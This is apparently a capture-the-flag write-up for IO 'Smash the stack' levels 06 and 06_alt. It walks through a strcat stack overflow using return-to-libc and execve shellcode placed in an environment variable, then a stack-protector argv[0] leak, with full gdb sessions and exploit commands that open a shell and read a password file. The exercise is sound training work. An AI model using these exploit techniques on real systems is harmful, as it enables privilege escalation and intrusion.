IO Smash the stack level 06

Level06

level6@io:/levels$ ls -la level06*
-r-sr-x--- 1 level7 level6 5849 Dec 18  2013 level06
-r-sr-x--- 1 level7 level6 7293 Aug 11  2010 level06_alt
-r-------- 1 level6 level6  487 Nov 14  2011 level06_alt.c
-r-------- 1 level7 level7   22 Sep 14 03:31 level06_alt.pass
-r-------- 1 level6 level6 1034 May  7  2015 level06.c

level6@io:/levels$ cat level06.c

//written by bla
//inspired by nnp
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum{
LANG_ENGLISH,
LANG_FRANCAIS,
LANG_DEUTSCH,
};

int language = LANG_ENGLISH;

struct UserRecord{
	char name[40];
	char password[32];
	int id;
};

void greetuser(struct UserRecord user){
	char greeting[64];
	switch(language){
		case LANG_ENGLISH:
			strcpy(greeting, "Hi "); break;
		case LANG_FRANCAIS:
			strcpy(greeting, "Bienvenue "); break;
		case LANG_DEUTSCH:
			strcpy(greeting, "Willkommen "); break;
	}
	strcat(greeting, user.name);
	printf("%s\n", greeting);
}

int main(int argc, char **argv, char **env){
	if(argc != 3) {
		printf("USAGE: %s [name] [password]\n", argv[0]);
		return 1;
	}

	struct UserRecord user = {0};
	strncpy(user.name, argv[1], sizeof(user.name));
	strncpy(user.password, argv[2], sizeof(user.password));

	char *envlang = getenv("LANG");
	if(envlang)
		if(!memcmp(envlang, "fr", 2))
			language = LANG_FRANCAIS;
		else if(!memcmp(envlang, "de", 2))
			language = LANG_DEUTSCH;

	greetuser(user);
}

Oki the insecure function here is strcat and the overflow occurs when adding to greeting. In order to exploit it we need to add some data hence exporting LANG

level6@io:/levels$ export LANG=de
level6@io:/levels$ gdb -q level06
Reading symbols from /levels/level06...(no debugging symbols found)...done.
(gdb) r $(python -c 'print "A" * 40 + " " + "B" * 40')
Starting program: /levels/level06 $(python -c 'print "A" * 40 + " " + "B" * 40')
Willkommen AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/100xw $esp
0xbffffbd0:	0x00424242	0x41414141	0x41414141	0x41414141
0xbffffbe0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbf0:	0x41414141	0x41414141	0x42424242	0x42424242
0xbffffc00:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffffc10:	0x42424242	0x42424242	0x00000000	0x00000001
0xbffffc20:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc30:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc40:	0x41414141	0x41414141	0x42424242	0x42424242
0xbffffc50:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffffc60:	0x42424242	0x42424242	0x00000000	0xbfffffa5
0xbffffc70:	0xb7e9e515	0xb7ff0590	0x080486db	0xb7fceff4
0xbffffc80:	0x00000000	0x00000000	0xbffffd08	0xb7e85e46
0xbffffc90:	0x00000003	0xbffffd34	0xbffffd44	0xb7fe08d8
0xbffffca0:	0xb7ff6821	0xffffffff	0xb7ffeff4	0x080482da
0xbffffcb0:	0x00000001	0xbffffcf0	0xb7fefc16	0xb7fffac0
0xbffffcc0:	0xb7fe0bd0	0xb7fceff4	0x00000000	0x00000000
0xbffffcd0:	0xbffffd08	0x1d82ddcf	0x32c7ebdf	0x00000000
0xbffffce0:	0x00000000	0x00000000	0x00000003	0x08048430
0xbffffcf0:	0x00000000	0xb7ff59c0	0xb7e85d6b	0xb7ffeff4
0xbffffd00:	0x00000003	0x08048430	0x00000000	0x08048451
0xbffffd10:	0x08048593	0x00000003	0xbffffd34	0x080486d0
0xbffffd20:	0x080486c0	0xb7ff0590	0xbffffd2c	0xb7fff908
0xbffffd30:	0x00000003	0xbffffe43	0xbffffe53	0xbffffe7c
0xbffffd40:	0x00000000	0xbffffea5	0xbffffeb5	0xbffffec9
0xbffffd50:	0xbffffedc	0xbffffee8	0xbfffff0f	0xbfffff1b

Oki so we can overwrite the return adress but look at the stack. Its mixed with A’s and B’s and contains a 0x00000000. I haven’t tried the ‘return 2 libc’ before so I wanted to give it a spin. In order for this to work we need to create our own fake stack like so

[ address of exit] [ address of ‘/bin/sh’ ] [ AAAA … ] .. [ BBBB …] [ address of system ]

level6@io:/levels$ gdb -q level06
Reading symbols from /levels/level06...(no debugging symbols found)...done.
(gdb) disassemble greetuser
Dump of assembler code for function greetuser:
   0x0804851c <+0>:	push   %ebp
   0x0804851d <+1>:	mov    %esp,%ebp
   0x0804851f <+3>:	sub    $0x58,%esp
   0x08048522 <+6>:	mov    0x8049964,%eax
   0x08048527 <+11>:	cmp    $0x1,%eax
   0x0804852a <+14>:	je     0x8048540 <greetuser+36>
   0x0804852c <+16>:	cmp    $0x2,%eax
   0x0804852f <+19>:	je     0x804855c <greetuser+64>
   0x08048531 <+21>:	test   %eax,%eax
   0x08048533 <+23>:	jne    0x8048574 <greetuser+88>
   0x08048535 <+25>:	lea    -0x48(%ebp),%eax
   0x08048538 <+28>:	movl   $0x206948,(%eax)
   0x0804853e <+34>:	jmp    0x8048574 <greetuser+88>
   0x08048540 <+36>:	lea    -0x48(%ebp),%eax
   0x08048543 <+39>:	movl   $0x6e656942,(%eax)
   0x08048549 <+45>:	movl   $0x756e6576,0x4(%eax)
   0x08048550 <+52>:	movw   $0x2065,0x8(%eax)
   0x08048556 <+58>:	movb   $0x0,0xa(%eax)
   0x0804855a <+62>:	jmp    0x8048574 <greetuser+88>
   0x0804855c <+64>:	lea    -0x48(%ebp),%eax
   0x0804855f <+67>:	movl   $0x6c6c6957,(%eax)
   0x08048565 <+73>:	movl   $0x6d6d6f6b,0x4(%eax)
   0x0804856c <+80>:	movl   $0x206e65,0x8(%eax)
   0x08048573 <+87>:	nop
   0x08048574 <+88>:	lea    0x8(%ebp),%eax
   0x08048577 <+91>:	mov    %eax,0x4(%esp)
   0x0804857b <+95>:	lea    -0x48(%ebp),%eax
   0x0804857e <+98>:	mov    %eax,(%esp)
   0x08048581 <+101>:	call   0x80483d0 <strcat@plt>
   0x08048586 <+106>:	lea    -0x48(%ebp),%eax
   0x08048589 <+109>:	mov    %eax,(%esp)
   0x0804858c <+112>:	call   0x80483f0 <puts@plt>
   0x08048591 <+117>:	leave
   0x08048592 <+118>:	ret
End of assembler dump.
(gdb) break *0x0804857e
(gdb) source /usr/local/peda/peda.py
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xb7eaac30 <system>
gdb-peda$ p exit
$2 = {<text variable, no debug info>} 0xb7e9e270 <exit>
gdb-peda$ searchmem /bin/sh
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xb7fab194 ("/bin/sh")
gdb-peda$ r $(python -c 'print "\x70\xe2\xe9\xb7" + "\x94\xb1\xfa\xb7" + "A"*32 + " " + "B"*25 + "\x30\xac\xea\xb7"')
[----------------------------------registers-----------------------------------]
EAX: 0xbffffb50 ("Willkommen ")
EBX: 0xbffffbf0 --> 0xb7e9e270 (<exit>:	push   ebp)
ECX: 0x0
EDX: 0xbffffba0 --> 0xb7e9e270 (<exit>:	push   ebp)
ESI: 0xbffffc3c --> 0xbfffffa5 --> 0x4c006564 ('de')
EDI: 0xbffffbec --> 0x1
EBP: 0xbffffb98 --> 0xbffffc58 --> 0xbffffcd8 --> 0x0
ESP: 0xbffffb40 --> 0xb7ee7ee6 (<memcmp+6>:	add    ebx,0xe710e)
EIP: 0x804857e (<greetuser+98>:	mov    DWORD PTR [esp],eax)
EFLAGS: 0x200246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048574 <greetuser+88>:	lea    eax,[ebp+0x8]
   0x8048577 <greetuser+91>:	mov    DWORD PTR [esp+0x4],eax
   0x804857b <greetuser+95>:	lea    eax,[ebp-0x48]
=> 0x804857e <greetuser+98>:	mov    DWORD PTR [esp],eax
   0x8048581 <greetuser+101>:	call   0x80483d0 <strcat@plt>
   0x8048586 <greetuser+106>:	lea    eax,[ebp-0x48]
   0x8048589 <greetuser+109>:	mov    DWORD PTR [esp],eax
   0x804858c <greetuser+112>:	call   0x80483f0 <puts@plt>
[------------------------------------stack-------------------------------------]
0000| 0xbffffb40 --> 0xb7ee7ee6 (<memcmp+6>:	add    ebx,0xe710e)
0004| 0xbffffb44 --> 0xbffffba0 --> 0xb7e9e270 (<exit>:	push   ebp)
0008| 0xbffffb48 --> 0xb7fefcf2 (lea    esi,[esi+0x0])
0012| 0xbffffb4c --> 0xb7fffac0 --> 0xb7fffa64 --> 0xb7fe0ba0 --> 0xb7fff908 --> 0x0
0016| 0xbffffb50 ("Willkommen ")
0020| 0xbffffb54 ("kommen ")
0024| 0xbffffb58 --> 0x206e65 ('en ')
0028| 0xbffffb5c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0804857e in greetuser ()
gdb-peda$ x/64xw $esp
0xbffffb40:	0xb7ee7ee6	0xbffffba0	0xb7fefcf2	0xb7fffac0
0xbffffb50:	0x6c6c6957	0x6d6d6f6b	0x00206e65	0x00000000
0xbffffb60:	0x00000001	0x08048288	0x0804993c	0x00000000
0xbffffb70:	0xb7e76874	0xbffffbf0	0x00000000	0xbffffc3c
0xbffffb80:	0xbffffc58	0xb7ff59c0	0x00000002	0xb7ee7f30
0xbffffb90:	0xb7ee7f67	0x00000000	0xbffffc58	0x080486af
0xbffffba0:	0xb7e9e270	0xb7fab194	0x41414141	0x41414141
0xbffffbb0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbc0:	0x41414141	0x41414141	0x42424242	0x42424242
0xbffffbd0:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffffbe0:	0xeaac3042	0x000000b7	0x00000000	0x00000001
0xbffffbf0:	0xb7e9e270	0xb7fab194	0x41414141	0x41414141
0xbffffc00:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc10:	0x41414141	0x41414141	0x42424242	0x42424242
0xbffffc20:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffffc30:	0xeaac3042	0x000000b7	0x00000000	0xbfffffa5
gdb-peda$ quit
level6@io:/levels$ ./level06 $(python -c 'print "\x70\xe2\xe9\xb7" + "\x94\xb1\xfa\xb7" + "A"*32 + " " + "B"*25 + "\x30\xac\xea\xb7"')
Willkommen p�鷔��AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBB0��
sh-4.2$ cat /home/level7/.pass
XXXXXXXXXXXXXXXX

And easier way would be just to use the EGG from level05

level6@io:/levels$ export LANG="de"
level6@io:/levels$ export EGG=$(python -c 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"')
level6@io:/levels$ /tmp/desdic1/getenv EGG /levels/level06
EGG will be at 0xbffffed3
level6@io:/levels$ /levels/level06 $(python -c 'print "A"*40 + " " + "B"*25 + "\xd3\xfe\xff\xbf"')
Willkommen AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBB����
sh-4.2$ cat /home/level7/.pass
XXXXXXXXXXXXXXXX

Level06 alt

#include <stdio.h>
#include <sys/fcntl.h>
#include <unistd.h>
#include <string.h>

char pass[32];

int main(int argc, char * argv[])
{

        char buf[32];
        FILE *f;

        f = fopen("/levels/level06_alt.pass", "r");

        fgets(pass, 32, f);
        fgets(buf, 999, stdin);

        if(!strcmp(buf, pass)) {
                printf("Success!\n");
                setreuid(geteuid(), geteuid());
                execl("/bin/sh", NULL, NULL);
        }

        return 0;
}

Since we cannot use GDB on a suid file that needs to read a file I have made a copy of the binary:

mkdir -p /tmp/des6 && cd /tmp/des6 && cp /levels/level06_alt aaaaaaaaa
echo "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC" > bbbbbbbbbbbbbb

Next edit the aaaaaaaaa and change the path from /levels/level06_alt.pass to /tmp/des6/bbbbbbbbbbbbbb

level6@io:/tmp/des6$ gdb -q aaaaaaaaa
Reading symbols from /tmp/des6/aaaaaaaaa...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x08048574 <+0>:	lea    ecx,[esp+0x4]
   0x08048578 <+4>:	and    esp,0xfffffff0
   0x0804857b <+7>:	push   DWORD PTR [ecx-0x4]
   0x0804857e <+10>:	push   ebp
   0x0804857f <+11>:	mov    ebp,esp
   0x08048581 <+13>:	push   ebx
   0x08048582 <+14>:	push   ecx
   0x08048583 <+15>:	sub    esp,0x40
   0x08048586 <+18>:	mov    eax,DWORD PTR [ecx+0x4]
   0x08048589 <+21>:	mov    DWORD PTR [ebp-0x3c],eax
   0x0804858c <+24>:	mov    eax,gs:0x14
   0x08048592 <+30>:	mov    DWORD PTR [ebp-0xc],eax
   0x08048595 <+33>:	xor    eax,eax
   0x08048597 <+35>:	mov    DWORD PTR [esp+0x4],0x8048720
   0x0804859f <+43>:	mov    DWORD PTR [esp],0x8048722
   0x080485a6 <+50>:	call   0x8048460 <fopen@plt>
   0x080485ab <+55>:	mov    DWORD PTR [ebp-0x30],eax
   0x080485ae <+58>:	mov    eax,DWORD PTR [ebp-0x30]
   0x080485b1 <+61>:	mov    DWORD PTR [esp+0x8],eax
   0x080485b5 <+65>:	mov    DWORD PTR [esp+0x4],0x20
   0x080485bd <+73>:	mov    DWORD PTR [esp],0x80498a0
   0x080485c4 <+80>:	call   0x8048430 <fgets@plt>
   0x080485c9 <+85>:	mov    eax,ds:0x8049880
   0x080485ce <+90>:	mov    DWORD PTR [esp+0x8],eax
   0x080485d2 <+94>:	mov    DWORD PTR [esp+0x4],0x3e7
   0x080485da <+102>:	lea    eax,[ebp-0x2c]
   0x080485dd <+105>:	mov    DWORD PTR [esp],eax
   0x080485e0 <+108>:	call   0x8048430 <fgets@plt>
   0x080485e5 <+113>:	mov    DWORD PTR [esp+0x4],0x80498a0
   0x080485ed <+121>:	lea    eax,[ebp-0x2c]
   0x080485f0 <+124>:	mov    DWORD PTR [esp],eax
   0x080485f3 <+127>:	call   0x80484a0 <strcmp@plt>
   0x080485f8 <+132>:	test   eax,eax
   0x080485fa <+134>:	jne    0x804863c <main+200>
   0x080485fc <+136>:	mov    DWORD PTR [esp],0x804873b
   0x08048603 <+143>:	call   0x8048490 <puts@plt>
   0x08048608 <+148>:	call   0x80484b0 <geteuid@plt>
   0x0804860d <+153>:	mov    ebx,eax
   0x0804860f <+155>:	call   0x80484b0 <geteuid@plt>
   0x08048614 <+160>:	mov    DWORD PTR [esp+0x4],ebx
   0x08048618 <+164>:	mov    DWORD PTR [esp],eax
   0x0804861b <+167>:	call   0x8048480 <setreuid@plt>
   0x08048620 <+172>:	mov    DWORD PTR [esp+0x8],0x0
   0x08048628 <+180>:	mov    DWORD PTR [esp+0x4],0x0
   0x08048630 <+188>:	mov    DWORD PTR [esp],0x8048744
   0x08048637 <+195>:	call   0x8048450 <execl@plt>
   0x0804863c <+200>:	mov    eax,0x0
   0x08048641 <+205>:	mov    edx,DWORD PTR [ebp-0xc]
   0x08048644 <+208>:	xor    edx,DWORD PTR gs:0x14
   0x0804864b <+215>:	je     0x8048652 <main+222>
   0x0804864d <+217>:	call   0x8048470 <__stack_chk_fail@plt>
   0x08048652 <+222>:	add    esp,0x40
   0x08048655 <+225>:	pop    ecx
   0x08048656 <+226>:	pop    ebx
   0x08048657 <+227>:	pop    ebp
---Type <return> to continue, or q <return> to quit---c
   0x08048658 <+228>:	lea    esp,[ecx-0x4]
   0x0804865b <+231>:	ret
End of assembler dump.
(gdb) break *0x080485e5
Breakpoint 1 at 0x80485e5
(gdb) r <<< $(python -c 'print "A"*232 + "\xa0\x98\x04\x08"')
Starting program: /tmp/des6/aaaaaaaaa <<< $(python -c 'print "A"*232 + "\xa0\x98\x04\x08"')

Breakpoint 1, 0x080485e5 in main ()
(gdb) x/100x $esp
0xbffffc50:	0xbffffc6c	0x000003e7	0xb7fcf440	0xbffffd54
0xbffffc60:	0x00000000	0xbffffd00	0x0804a008	0x41414141
0xbffffc70:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc80:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc90:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffca0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffcb0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffcc0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffcd0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffce0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffcf0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffd00:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffd10:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffd20:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffd30:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffd40:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffd50:	0x41414141	0x080498a0	0x0000000a	0xbffffe77
0xbffffd60:	0xbffffe87	0xbffffe9b	0xbffffeae	0xbffffecd
0xbffffd70:	0xbffffed9	0xbfffff00	0xbfffff0c	0xbfffff60
0xbffffd80:	0xbfffff76	0xbfffff85	0xbfffff93	0xbfffffa4
0xbffffd90:	0xbfffffad	0xbfffffbf	0xbfffffc7	0xbfffffd9
0xbffffda0:	0x00000000	0x00000020	0xb7fe1418	0x00000021
0xbffffdb0:	0xb7fe1000	0x00000010	0x178bfbfd	0x00000006
0xbffffdc0:	0x00001000	0x00000011	0x00000064	0x00000003
0xbffffdd0:	0x08048034	0x00000004	0x00000020	0x00000005
(gdb) x/x 0x080498a0
0x80498a0 <pass>:	0x43434343
(gdb)
0x80498a4 <pass+4>:	0x43434343
(gdb)
0x80498a8 <pass+8>:	0x43434343
(gdb)
0x80498ac <pass+12>:	0x43434343
(gdb)
0x80498b0 <pass+16>:	0x43434343
(gdb)
0x80498b4 <pass+20>:	0x43434343
(gdb)
0x80498b8 <pass+24>:	0x43434343
(gdb)
0x80498bc <pass+28>:	0x00434343
(gdb)
0x80498c0:	0x00000000
(gdb) c
Continuing.
*** stack smashing detected ***: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC terminated
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xb7f59750]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xee6fa)[0xb7f596fa]
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC[0x8048652]
[0x41414141]
======= Memory map: ========
08048000-08049000 r-xp 00000000 fe:00 270793     /tmp/des6/aaaaaaaaa
08049000-0804a000 rw-p 00000000 fe:00 270793     /tmp/des6/aaaaaaaaa
0804a000-0806b000 rw-p 00000000 00:00 0          [heap]
b7e41000-b7e5d000 r-xp 00000000 fe:00 393223     /lib/i386-linux-gnu/libgcc_s.so.1
b7e5d000-b7e5e000 rw-p 0001b000 fe:00 393223     /lib/i386-linux-gnu/libgcc_s.so.1
b7e6a000-b7e6b000 rw-p 00000000 00:00 0
b7e6b000-b7fcc000 r-xp 00000000 fe:00 395198     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fcc000-b7fcd000 ---p 00161000 fe:00 395198     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fcd000-b7fcf000 r--p 00161000 fe:00 395198     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fcf000-b7fd0000 rw-p 00163000 fe:00 395198     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fd0000-b7fd3000 rw-p 00000000 00:00 0
b7fdd000-b7fe1000 rw-p 00000000 00:00 0
b7fe1000-b7fe2000 r-xp 00000000 00:00 0          [vdso]
b7fe2000-b7ffe000 r-xp 00000000 fe:00 401958     /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r--p 0001b000 fe:00 401958     /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rw-p 0001c000 fe:00 401958     /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

Program received signal SIGABRT, Aborted.
0xb7fe1428 in __kernel_vsyscall ()
(gdb)

Oki so we changed argv[0] to point to 0x080498a0 (The pointer to the flag). So ..

level6@io:~$ python -c 'print "A"*232 + "\xa0\x98\x04\x08"'|/levels/level06_alt
*** stack smashing detected ***: XXXXXXXXXXXXXXXXXXXXX
 terminated
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xb7f59750]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xee6fa)[0xb7f596fa]
XXXXXXXXXXXXXXXXXXXXX
[0x8048652]
[0x41414141]
======= Memory map: ========
08048000-08049000 r-xp 00000000 fe:00 268704     /levels/level06_alt
08049000-0804a000 rw-p 00000000 fe:00 268704     /levels/level06_alt
0804a000-0806b000 rw-p 00000000 00:00 0          [heap]
b7e41000-b7e5d000 r-xp 00000000 fe:00 393223     /lib/i386-linux-gnu/libgcc_s.so.1
b7e5d000-b7e5e000 rw-p 0001b000 fe:00 393223     /lib/i386-linux-gnu/libgcc_s.so.1
b7e6a000-b7e6b000 rw-p 00000000 00:00 0
b7e6b000-b7fcc000 r-xp 00000000 fe:00 395198     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fcc000-b7fcd000 ---p 00161000 fe:00 395198     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fcd000-b7fcf000 r--p 00161000 fe:00 395198     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fcf000-b7fd0000 rw-p 00163000 fe:00 395198     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fd0000-b7fd3000 rw-p 00000000 00:00 0
b7fdd000-b7fe1000 rw-p 00000000 00:00 0
b7fe1000-b7fe2000 r-xp 00000000 00:00 0          [vdso]
b7fe2000-b7ffe000 r-xp 00000000 fe:00 401958     /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r--p 0001b000 fe:00 401958     /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rw-p 0001c000 fe:00 401958     /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]
Aborted

Special thanks to Konrad for showing me this trick